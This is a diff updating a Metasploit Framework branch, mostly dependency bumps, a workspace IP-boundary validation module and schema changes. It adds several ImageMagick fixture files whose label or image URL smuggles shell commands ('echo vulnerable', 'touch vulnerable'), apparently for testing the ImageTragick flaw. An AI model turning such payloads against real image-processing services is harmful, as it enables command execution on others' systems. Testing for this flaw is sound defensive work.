Bring #6793 up to date with upstream-master
commit e8304e684c

@@ -1 +1 @@
-2.1.9
+2.3.1
@@ -10,7 +10,7 @@ addons:
 - graphviz
 language: ruby
 rvm:
-- '2.1.8'
+- '2.3.1'

 env:
 - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
Gemfile (8 changed lines)

@@ -25,14 +25,14 @@ end

 group :development, :test do
   # automatically include factories from spec/factories
-  gem 'factory_girl_rails', '~> 4.5.0'
+  gem 'factory_girl_rails'
   # Make rspec output shorter and more useful
-  gem 'fivemat', '~> 1.3.1'
+  gem 'fivemat'
   # running documentation generation tasks and rspec tasks
-  gem 'rake', '>= 10.0.0'
+  gem 'rake'
   # Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
   # environment is development
-  gem 'rspec-rails' , '~> 3.3'
+  gem 'rspec-rails'
 end

 group :test do
Gemfile.lock (298 changed lines)

@@ -1,243 +1,249 @@
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.11.22)
|
||||
actionpack (>= 4.0.9, < 4.1.0)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
metasploit-framework (4.12.7)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
bcrypt
|
||||
filesize
|
||||
jsobfu (~> 0.4.1)
|
||||
jsobfu
|
||||
json
|
||||
metasm (~> 1.0.2)
|
||||
metasm
|
||||
metasploit-concern
|
||||
metasploit-credential (= 1.1.0)
|
||||
metasploit-model (= 1.1.0)
|
||||
metasploit-payloads (= 1.1.6)
|
||||
metasploit_data_models (= 1.3.0)
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.1.11)
|
||||
metasploit_data_models
|
||||
msgpack
|
||||
network_interface (~> 0.0.1)
|
||||
network_interface
|
||||
nokogiri
|
||||
octokit
|
||||
openssl-ccm (= 1.2.1)
|
||||
packetfu (= 1.1.11)
|
||||
patch_finder (>= 1.0.2)
|
||||
openssl-ccm
|
||||
packetfu
|
||||
patch_finder
|
||||
pcaprub
|
||||
pg (>= 0.11)
|
||||
pg
|
||||
railties
|
||||
rb-readline-r7
|
||||
recog (= 2.0.14)
|
||||
recog
|
||||
redcarpet
|
||||
robots
|
||||
rubyzip (~> 1.1)
|
||||
rubyzip
|
||||
sqlite3
|
||||
tzinfo
|
||||
tzinfo-data
|
||||
|
||||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
actionmailer (4.0.13)
|
||||
actionpack (= 4.0.13)
|
||||
mail (~> 2.5, >= 2.5.4)
|
||||
actionpack (4.0.13)
|
||||
activesupport (= 4.0.13)
|
||||
builder (~> 3.1.0)
|
||||
erubis (~> 2.7.0)
|
||||
rack (~> 1.5.2)
|
||||
actionpack (4.2.6)
|
||||
actionview (= 4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
rack (~> 1.6)
|
||||
rack-test (~> 0.6.2)
|
||||
activemodel (4.0.13)
|
||||
activesupport (= 4.0.13)
|
||||
builder (~> 3.1.0)
|
||||
activerecord (4.0.13)
|
||||
activemodel (= 4.0.13)
|
||||
activerecord-deprecated_finders (~> 1.0.2)
|
||||
activesupport (= 4.0.13)
|
||||
arel (~> 4.0.0)
|
||||
activerecord-deprecated_finders (1.0.4)
|
||||
activesupport (4.0.13)
|
||||
i18n (~> 0.6, >= 0.6.9)
|
||||
minitest (~> 4.2)
|
||||
multi_json (~> 1.3)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo (~> 0.3.37)
|
||||
addressable (2.3.8)
|
||||
arel (4.0.2)
|
||||
arel-helpers (2.2.0)
|
||||
activerecord (>= 3.1.0, < 5)
|
||||
aruba (0.6.2)
|
||||
childprocess (>= 0.3.6)
|
||||
cucumber (>= 1.1.1)
|
||||
rspec-expectations (>= 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
actionview (4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
builder (~> 3.1)
|
||||
erubis (~> 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
activemodel (4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
builder (~> 3.1)
|
||||
activerecord (4.2.6)
|
||||
activemodel (= 4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
arel (~> 6.0)
|
||||
activesupport (4.2.6)
|
||||
i18n (~> 0.7)
|
||||
json (~> 1.7, >= 1.7.7)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
tzinfo (~> 1.1)
|
||||
addressable (2.4.0)
|
||||
arel (6.0.3)
|
||||
arel-helpers (2.3.0)
|
||||
activerecord (>= 3.1.0, < 6)
|
||||
aruba (0.14.1)
|
||||
childprocess (~> 0.5.6)
|
||||
contracts (~> 0.9)
|
||||
cucumber (>= 1.3.19)
|
||||
ffi (~> 1.9.10)
|
||||
rspec-expectations (>= 2.99)
|
||||
thor (~> 0.19)
|
||||
bcrypt (3.1.11)
|
||||
builder (3.1.4)
|
||||
capybara (2.4.4)
|
||||
builder (3.2.2)
|
||||
capybara (2.7.1)
|
||||
addressable
|
||||
mime-types (>= 1.16)
|
||||
nokogiri (>= 1.3.3)
|
||||
rack (>= 1.0.0)
|
||||
rack-test (>= 0.5.4)
|
||||
xpath (~> 2.0)
|
||||
childprocess (0.5.5)
|
||||
childprocess (0.5.9)
|
||||
ffi (~> 1.0, >= 1.0.11)
|
||||
coderay (1.1.0)
|
||||
cucumber (1.3.19)
|
||||
coderay (1.1.1)
|
||||
contracts (0.14.0)
|
||||
cucumber (2.3.3)
|
||||
builder (>= 2.1.2)
|
||||
cucumber-core (~> 1.4.0)
|
||||
cucumber-wire (~> 0.0.1)
|
||||
diff-lcs (>= 1.1.3)
|
||||
gherkin (~> 2.12)
|
||||
gherkin (~> 3.2.0)
|
||||
multi_json (>= 1.7.5, < 2.0)
|
||||
multi_test (>= 0.1.2)
|
||||
cucumber-rails (1.4.2)
|
||||
cucumber-core (1.4.0)
|
||||
gherkin (~> 3.2.0)
|
||||
cucumber-rails (1.4.3)
|
||||
capybara (>= 1.1.2, < 3)
|
||||
cucumber (>= 1.3.8, < 2)
|
||||
mime-types (>= 1.16, < 3)
|
||||
cucumber (>= 1.3.8, < 3)
|
||||
mime-types (>= 1.16, < 4)
|
||||
nokogiri (~> 1.5)
|
||||
rails (>= 3, < 5)
|
||||
railties (>= 3, < 5)
|
||||
cucumber-wire (0.0.1)
|
||||
diff-lcs (1.2.5)
|
||||
docile (1.1.5)
|
||||
erubis (2.7.0)
|
||||
factory_girl (4.5.0)
|
||||
factory_girl (4.7.0)
|
||||
activesupport (>= 3.0.0)
|
||||
factory_girl_rails (4.5.0)
|
||||
factory_girl (~> 4.5.0)
|
||||
factory_girl_rails (4.7.0)
|
||||
factory_girl (~> 4.7.0)
|
||||
railties (>= 3.0.0)
|
||||
faraday (0.9.2)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
ffi (1.9.8)
|
||||
ffi (1.9.10)
|
||||
filesize (0.1.1)
|
||||
fivemat (1.3.2)
|
||||
gherkin (2.12.2)
|
||||
multi_json (~> 1.3)
|
||||
hike (1.2.3)
|
||||
gherkin (3.2.0)
|
||||
i18n (0.7.0)
|
||||
jsobfu (0.4.1)
|
||||
rkelly-remix (= 0.0.6)
|
||||
json (1.8.3)
|
||||
mail (2.6.3)
|
||||
mime-types (>= 1.16, < 3)
|
||||
loofah (2.0.3)
|
||||
nokogiri (>= 1.5.9)
|
||||
metasm (1.0.2)
|
||||
metasploit-concern (1.1.0)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
metasploit-credential (1.1.0)
|
||||
metasploit-concern (~> 1.1)
|
||||
metasploit-model (~> 1.1)
|
||||
metasploit_data_models (~> 1.3)
|
||||
metasploit-concern (2.0.1)
|
||||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (2.0.2)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models
|
||||
pg
|
||||
railties
|
||||
rubyntlm
|
||||
rubyzip (~> 1.1)
|
||||
metasploit-model (1.1.0)
|
||||
activemodel (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
metasploit-payloads (1.1.6)
|
||||
metasploit_data_models (1.3.0)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
rubyzip
|
||||
metasploit-model (2.0.0)
|
||||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.1.11)
|
||||
metasploit_data_models (2.0.0)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
arel-helpers
|
||||
metasploit-concern (~> 1.1)
|
||||
metasploit-model (~> 1.1)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
pg
|
||||
postgres_ext
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
method_source (0.8.2)
|
||||
mime-types (2.6.1)
|
||||
mime-types (3.0)
|
||||
mime-types-data (~> 3.2015)
|
||||
mime-types-data (3.2016.0221)
|
||||
mini_portile2 (2.0.0)
|
||||
minitest (4.7.5)
|
||||
msgpack (0.7.4)
|
||||
multi_json (1.11.2)
|
||||
minitest (5.8.4)
|
||||
msgpack (0.7.6)
|
||||
multi_json (1.12.0)
|
||||
multi_test (0.1.2)
|
||||
multipart-post (2.0.0)
|
||||
network_interface (0.0.1)
|
||||
nokogiri (1.6.7.2)
|
||||
mini_portile2 (~> 2.0.0.rc2)
|
||||
octokit (4.2.0)
|
||||
sawyer (~> 0.6.0, >= 0.5.3)
|
||||
octokit (4.3.0)
|
||||
sawyer (~> 0.7.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
packetfu (1.1.11)
|
||||
network_interface (~> 0.0)
|
||||
pcaprub (~> 0.12)
|
||||
patch_finder (1.0.2)
|
||||
pcaprub (0.12.1)
|
||||
pcaprub (0.12.4)
|
||||
pg (0.18.4)
|
||||
pg_array_parser (0.0.9)
|
||||
postgres_ext (3.0.0)
|
||||
activerecord (>= 4.0.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.10.1)
|
||||
pry (0.10.3)
|
||||
coderay (~> 1.1.0)
|
||||
method_source (~> 0.8.1)
|
||||
slop (~> 3.4)
|
||||
rack (1.5.5)
|
||||
rack (1.6.4)
|
||||
rack-test (0.6.3)
|
||||
rack (>= 1.0)
|
||||
rails (4.0.13)
|
||||
actionmailer (= 4.0.13)
|
||||
actionpack (= 4.0.13)
|
||||
activerecord (= 4.0.13)
|
||||
activesupport (= 4.0.13)
|
||||
bundler (>= 1.3.0, < 2.0)
|
||||
railties (= 4.0.13)
|
||||
sprockets-rails (~> 2.0)
|
||||
railties (4.0.13)
|
||||
actionpack (= 4.0.13)
|
||||
activesupport (= 4.0.13)
|
||||
rails-deprecated_sanitizer (1.0.3)
|
||||
activesupport (>= 4.2.0.alpha)
|
||||
rails-dom-testing (1.0.7)
|
||||
activesupport (>= 4.2.0.beta, < 5.0)
|
||||
nokogiri (~> 1.6.0)
|
||||
rails-deprecated_sanitizer (>= 1.0.1)
|
||||
rails-html-sanitizer (1.0.3)
|
||||
loofah (~> 2.0)
|
||||
railties (4.2.6)
|
||||
actionpack (= 4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (10.4.2)
|
||||
rake (11.1.2)
|
||||
rb-readline-r7 (0.5.2.0)
|
||||
recog (2.0.14)
|
||||
recog (2.0.21)
|
||||
nokogiri
|
||||
redcarpet (3.3.4)
|
||||
rkelly-remix (0.0.6)
|
||||
robots (0.10.1)
|
||||
rspec-core (3.3.2)
|
||||
rspec-support (~> 3.3.0)
|
||||
rspec-expectations (3.3.1)
|
||||
rspec-core (3.4.4)
|
||||
rspec-support (~> 3.4.0)
|
||||
rspec-expectations (3.4.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.3.0)
|
||||
rspec-mocks (3.3.2)
|
||||
rspec-support (~> 3.4.0)
|
||||
rspec-mocks (3.4.1)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.3.0)
|
||||
rspec-rails (3.3.3)
|
||||
rspec-support (~> 3.4.0)
|
||||
rspec-rails (3.4.2)
|
||||
actionpack (>= 3.0, < 4.3)
|
||||
activesupport (>= 3.0, < 4.3)
|
||||
railties (>= 3.0, < 4.3)
|
||||
rspec-core (~> 3.3.0)
|
||||
rspec-expectations (~> 3.3.0)
|
||||
rspec-mocks (~> 3.3.0)
|
||||
rspec-support (~> 3.3.0)
|
||||
rspec-support (3.3.0)
|
||||
rspec-core (~> 3.4.0)
|
||||
rspec-expectations (~> 3.4.0)
|
||||
rspec-mocks (~> 3.4.0)
|
||||
rspec-support (~> 3.4.0)
|
||||
rspec-support (3.4.1)
|
||||
rubyntlm (0.6.0)
|
||||
rubyzip (1.2.0)
|
||||
sawyer (0.6.0)
|
||||
addressable (~> 2.3.5)
|
||||
sawyer (0.7.0)
|
||||
addressable (>= 2.3.5, < 2.5)
|
||||
faraday (~> 0.8, < 0.10)
|
||||
shoulda-matchers (2.8.0)
|
||||
activesupport (>= 3.0.0)
|
||||
simplecov (0.9.2)
|
||||
shoulda-matchers (3.1.1)
|
||||
activesupport (>= 4.0.0)
|
||||
simplecov (0.11.2)
|
||||
docile (~> 1.1.0)
|
||||
multi_json (~> 1.0)
|
||||
simplecov-html (~> 0.9.0)
|
||||
simplecov-html (0.9.0)
|
||||
json (~> 1.8)
|
||||
simplecov-html (~> 0.10.0)
|
||||
simplecov-html (0.10.0)
|
||||
slop (3.6.0)
|
||||
sprockets (2.12.3)
|
||||
hike (~> 1.2)
|
||||
multi_json (~> 1.0)
|
||||
rack (~> 1.0)
|
||||
tilt (~> 1.1, != 1.3.0)
|
||||
sprockets-rails (2.2.4)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
sprockets (>= 2.8, < 4.0)
|
||||
sqlite3 (1.3.11)
|
||||
thor (0.19.1)
|
||||
thread_safe (0.3.5)
|
||||
tilt (1.4.1)
|
||||
timecop (0.7.3)
|
||||
tzinfo (0.3.45)
|
||||
timecop (0.8.1)
|
||||
tzinfo (1.2.2)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2016.4)
|
||||
tzinfo (>= 1.0.0)
|
||||
xpath (2.0.0)
|
||||
nokogiri (~> 1.3)
|
||||
yard (0.8.7.6)
|
||||
|
@ -248,18 +254,18 @@ PLATFORMS
|
|||
DEPENDENCIES
|
||||
aruba
|
||||
cucumber-rails
|
||||
factory_girl_rails (~> 4.5.0)
|
||||
fivemat (~> 1.3.1)
|
||||
factory_girl_rails
|
||||
fivemat
|
||||
metasploit-framework!
|
||||
octokit (~> 4.0)
|
||||
pry
|
||||
rake (>= 10.0.0)
|
||||
rake
|
||||
redcarpet
|
||||
rspec-rails (~> 3.3)
|
||||
rspec-rails
|
||||
shoulda-matchers
|
||||
simplecov
|
||||
timecop
|
||||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.11.2
|
||||
1.12.5
|
||||
|
|
@@ -0,0 +1,82 @@
module Mdm::Workspace::BoundaryRange
  extend ActiveSupport::Concern

  included do
    #
    # Validations
    #

    validate :boundary_must_be_ip_range

    #
    # Instance Methods
    #

    # If {#limit_to_network} is disabled, this will always return `true`.
    # Otherwise, return `true` only if all of the given IPs are within the
    # project {#boundary boundaries}.
    #
    # @param ips [String] IP range(s)
    # @return [true] if actions on ips are allowed.
    # @return [false] if actions are not allowed on ips.
    def allow_actions_on?(ips)
      return true unless limit_to_network
      return true unless boundary
      return true if boundary.empty?
      boundaries = Shellwords.split(boundary)
      return true if boundaries.empty? # It's okay if there is no boundary range after all
      given_range = Rex::Socket::RangeWalker.new(ips)
      return false unless given_range # Can't do things to nonexistant IPs
      allowed = false
      boundaries.each do |boundary_range|
        ok_range = Rex::Socket::RangeWalker.new(boundary)
        allowed = true if ok_range.include_range? given_range
      end
      return allowed
    end

    # Validates that {#boundary} is {#valid_ip_or_range? a valid IP address or
    # IP address range}. Due to this not being tested before it was moved here
    # from Mdm, the default workspace does not validate. We always validate boundaries
    # and a workspace may have a blank default boundary.
    #
    # @return [void]
    def boundary_must_be_ip_range
      unless boundary.blank?
        begin
          boundaries = Shellwords.split(boundary)
        rescue ArgumentError
          boundaries = []
        end

        boundaries.each do |range|
          unless valid_ip_or_range?(range)
            errors.add(:boundary, "must be a valid IP range")
          end
        end
      end
    end

    # Returns an array of addresses ranges
    #
    # @return [Array<String>]
    def addresses
      (boundary || "").split("\n")
    end

    private

    # Returns whether `string` is a valid IP address or IP address range.
    #
    # @return [true] if valid IP address or IP address range.
    # @return [false] otherwise.
    def valid_ip_or_range?(string)
      range = Rex::Socket::RangeWalker.new(string)
      range && range.ranges && range.ranges.any?
    end

  end

end
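A minimal usage sketch of the concern above (hypothetical workspace object and attribute values, not part of the PR): `allow_actions_on?` only restricts anything when `limit_to_network` is set and `boundary` is non-empty.

```
# Hypothetical example: a workspace restricted to two boundary ranges.
workspace = Mdm::Workspace.new(
  boundary:         '10.0.0.0/24 192.168.1.1-192.168.1.50',
  limit_to_network: true
)

workspace.allow_actions_on?('10.0.0.7')    # => true  (inside 10.0.0.0/24)
workspace.allow_actions_on?('172.16.0.1')  # => false (outside every boundary range)

workspace.limit_to_network = false
workspace.allow_actions_on?('172.16.0.1')  # => true  (limit disabled, so everything is allowed)
```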
@@ -0,0 +1,5 @@
if defined? Metasploit::Framework::Application
  Metasploit::Framework::Application.configure do
    config.log_level = :info
  end
end
@@ -28,7 +28,7 @@ File.readlines(sitelist).each do |site|
   next if site =~ /^#/

   out = File.join(output, site + ".txt")
-  File.unlink(out) if File.exists?(out)
+  File.unlink(out) if File.exist?(out)

   fd = File.open(out, "a")

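For context, not part of the diff itself: `File.exists?` is a long-deprecated alias of `File.exist?`, so this change silences a Ruby deprecation warning without changing behaviour.

```
# Deprecated alias spelling; newer Rubies warn about it:
File.exists?("/etc/hosts")

# Preferred, equivalent call:
File.exist?("/etc/hosts")
```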
@@ -0,0 +1,14 @@
id=ImageMagick version=1.0
class=DirectClass colors=0 matte=False
columns=1 rows=1 depth=16
colorspace=sRGB
page=1x1+0+0
rendering-intent=Perceptual
gamma=0.454545
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
white-point=0.3127,0.329
date:create=2016-05-04T00:19:42-05:00
date:modify=2016-05-04T00:19:42-05:00
label={";echo vulnerable"}

:ÿÿÿÿÿÿ

@@ -0,0 +1,8 @@
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 'https://localhost";echo vulnerable"'
pop graphic-context
pop graphic-context

@@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
xlink:href="https://localhost";echo vulnerable"" />
</svg>
(new SVG file, 593 B)
@@ -0,0 +1,14 @@
id=ImageMagick version=1.0
class=DirectClass colors=0 matte=False
columns=1 rows=1 depth=16
colorspace=sRGB
page=1x1+0+0
rendering-intent=Perceptual
gamma=0.454545
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
white-point=0.3127,0.329
date:create=2016-05-04T00:19:42-05:00
date:modify=2016-05-04T00:19:42-05:00
label={";touch vulnerable"}

:ÿÿÿÿÿÿ

@@ -0,0 +1,8 @@
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|touch vulnerable'
pop graphic-context
pop graphic-context

@@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
xlink:href="|touch vulnerable" />
</svg>
(new SVG file, 480 B)
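These fixtures follow the well-known ImageTragick (CVE-2016-3714) delegate-injection payload formats: MVG/SVG/MSL-style inputs whose embedded URL or label smuggles a shell command. A sketch of how such fixtures are typically exercised against a vulnerable ImageMagick build (filenames are illustrative assumptions):

```
$ convert exploit.mvg out.png   # on a vulnerable build this also runs the injected `touch vulnerable`
$ ls -l vulnerable              # the marker file exists only if the injection fired
```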
|
@ -23,13 +23,27 @@
|
|||
document.getElementById('overview_info').style.display = "none";
|
||||
document.getElementById('knowledge_base').style.display = "inline";
|
||||
}
|
||||
|
||||
function initDoc() {
|
||||
var kb = document.getElementById('knowledge_base');
|
||||
var oi = document.getElementById('overview_info');
|
||||
oi.style.display = "none";
|
||||
kb.style.display = "inline";
|
||||
|
||||
var kb_button = document.getElementById('knowledge_base_button');
|
||||
var oi_button = document.getElementById('overview_info_button');
|
||||
kb_button.style.borderColor = "#ccc";
|
||||
kb_button.style.color = "#333";
|
||||
oi_button.style.borderColor = "#EEEEEE";
|
||||
oi_button.style.color = "#C4C4C4";
|
||||
}
|
||||
</script>
|
||||
<% end %>
|
||||
<style>
|
||||
<%= load_css %>
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<body onload="initDoc()">
|
||||
<% unless kb.empty? %>
|
||||
<table border="0">
|
||||
<tr>
|
||||
|
|
|
@ -89,7 +89,6 @@ code {
|
|||
}
|
||||
pre {
|
||||
display: block;
|
||||
padding: 16px;
|
||||
margin: 0 0 18px;
|
||||
line-height: 16px;
|
||||
font-size: 13px;
|
||||
|
@ -115,8 +114,8 @@ pre code {
|
|||
padding:10px 5px;
|
||||
border-style:solid;
|
||||
border-width:1px;
|
||||
border-color:#ccc;
|
||||
color:#333;
|
||||
border-color:#EEEEEE;
|
||||
color:#C4C4C4;
|
||||
}
|
||||
#knowledge_base_button {
|
||||
font-family:Arial, sans-serif;
|
||||
|
@ -124,22 +123,18 @@ pre code {
|
|||
padding:10px 5px;
|
||||
border-style:solid;
|
||||
border-width:1px;
|
||||
border-color:#EEEEEE;
|
||||
color:#C4C4C4;
|
||||
border-color:#ccc;
|
||||
color:#333;
|
||||
}
|
||||
#overview_info_button:hover, #knowledge_base_button:hover {
|
||||
cursor: pointer;
|
||||
}
|
||||
#knowledge_base {
|
||||
display: none;
|
||||
}
|
||||
#long_list {
|
||||
height:280px;
|
||||
overflow:auto;
|
||||
border-style: solid;
|
||||
border-width: 1px;
|
||||
border-color: #ccc;
|
||||
padding: 5px;
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -660,6 +660,7 @@ fresno
|
|||
front
|
||||
frontdesk
|
||||
fs
|
||||
fs1
|
||||
fsp
|
||||
ftp
|
||||
ftp-
|
||||
|
@ -1495,6 +1496,7 @@ shoppers
|
|||
shopping
|
||||
si
|
||||
siebel
|
||||
siem
|
||||
sierra
|
||||
sigma
|
||||
signin
|
||||
|
|
db/schema.rb (138 changed lines)
|
@ -11,18 +11,18 @@
|
|||
#
|
||||
# It's strongly recommended that you check this file into your version control system.
|
||||
|
||||
ActiveRecord::Schema.define(version: 20150514182921) do
|
||||
ActiveRecord::Schema.define(version: 20160415153312) do
|
||||
|
||||
# These are extensions that must be enabled in order to support this database
|
||||
enable_extension "plpgsql"
|
||||
|
||||
create_table "api_keys", force: true do |t|
|
||||
create_table "api_keys", force: :cascade do |t|
|
||||
t.text "token"
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "automatic_exploitation_match_results", force: true do |t|
|
||||
create_table "automatic_exploitation_match_results", force: :cascade do |t|
|
||||
t.integer "match_id"
|
||||
t.integer "run_id"
|
||||
t.string "state", null: false
|
||||
|
@ -33,7 +33,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "automatic_exploitation_match_results", ["match_id"], name: "index_automatic_exploitation_match_results_on_match_id", using: :btree
|
||||
add_index "automatic_exploitation_match_results", ["run_id"], name: "index_automatic_exploitation_match_results_on_run_id", using: :btree
|
||||
|
||||
create_table "automatic_exploitation_match_sets", force: true do |t|
|
||||
create_table "automatic_exploitation_match_sets", force: :cascade do |t|
|
||||
t.integer "workspace_id"
|
||||
t.integer "user_id"
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -43,7 +43,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "automatic_exploitation_match_sets", ["user_id"], name: "index_automatic_exploitation_match_sets_on_user_id", using: :btree
|
||||
add_index "automatic_exploitation_match_sets", ["workspace_id"], name: "index_automatic_exploitation_match_sets_on_workspace_id", using: :btree
|
||||
|
||||
create_table "automatic_exploitation_matches", force: true do |t|
|
||||
create_table "automatic_exploitation_matches", force: :cascade do |t|
|
||||
t.integer "module_detail_id"
|
||||
t.string "state"
|
||||
t.integer "nexpose_data_vulnerability_definition_id"
|
||||
|
@ -58,7 +58,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "automatic_exploitation_matches", ["module_detail_id"], name: "index_automatic_exploitation_matches_on_module_detail_id", using: :btree
|
||||
add_index "automatic_exploitation_matches", ["module_fullname"], name: "index_automatic_exploitation_matches_on_module_fullname", using: :btree
|
||||
|
||||
create_table "automatic_exploitation_runs", force: true do |t|
|
||||
create_table "automatic_exploitation_runs", force: :cascade do |t|
|
||||
t.integer "workspace_id"
|
||||
t.integer "user_id"
|
||||
t.integer "match_set_id"
|
||||
|
@ -70,7 +70,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "automatic_exploitation_runs", ["user_id"], name: "index_automatic_exploitation_runs_on_user_id", using: :btree
|
||||
add_index "automatic_exploitation_runs", ["workspace_id"], name: "index_automatic_exploitation_runs_on_workspace_id", using: :btree
|
||||
|
||||
create_table "clients", force: true do |t|
|
||||
create_table "clients", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.datetime "created_at"
|
||||
t.string "ua_string", limit: 1024, null: false
|
||||
|
@ -79,17 +79,17 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at"
|
||||
end
|
||||
|
||||
create_table "credential_cores_tasks", id: false, force: true do |t|
|
||||
create_table "credential_cores_tasks", id: false, force: :cascade do |t|
|
||||
t.integer "core_id"
|
||||
t.integer "task_id"
|
||||
end
|
||||
|
||||
create_table "credential_logins_tasks", id: false, force: true do |t|
|
||||
create_table "credential_logins_tasks", id: false, force: :cascade do |t|
|
||||
t.integer "login_id"
|
||||
t.integer "task_id"
|
||||
end
|
||||
|
||||
create_table "creds", force: true do |t|
|
||||
create_table "creds", force: :cascade do |t|
|
||||
t.integer "service_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -102,7 +102,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.string "source_type"
|
||||
end
|
||||
|
||||
create_table "events", force: true do |t|
|
||||
create_table "events", force: :cascade do |t|
|
||||
t.integer "workspace_id"
|
||||
t.integer "host_id"
|
||||
t.datetime "created_at"
|
||||
|
@ -114,7 +114,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "info"
|
||||
end
|
||||
|
||||
create_table "exploit_attempts", force: true do |t|
|
||||
create_table "exploit_attempts", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.integer "service_id"
|
||||
t.integer "vuln_id"
|
||||
|
@ -130,7 +130,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "fail_detail"
|
||||
end
|
||||
|
||||
create_table "exploited_hosts", force: true do |t|
|
||||
create_table "exploited_hosts", force: :cascade do |t|
|
||||
t.integer "host_id", null: false
|
||||
t.integer "service_id"
|
||||
t.string "session_uuid", limit: 8
|
||||
|
@ -140,7 +140,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "host_details", force: true do |t|
|
||||
create_table "host_details", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.integer "nx_console_id"
|
||||
t.integer "nx_device_id"
|
||||
|
@ -151,7 +151,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.float "nx_risk_score"
|
||||
end
|
||||
|
||||
create_table "hosts", force: true do |t|
|
||||
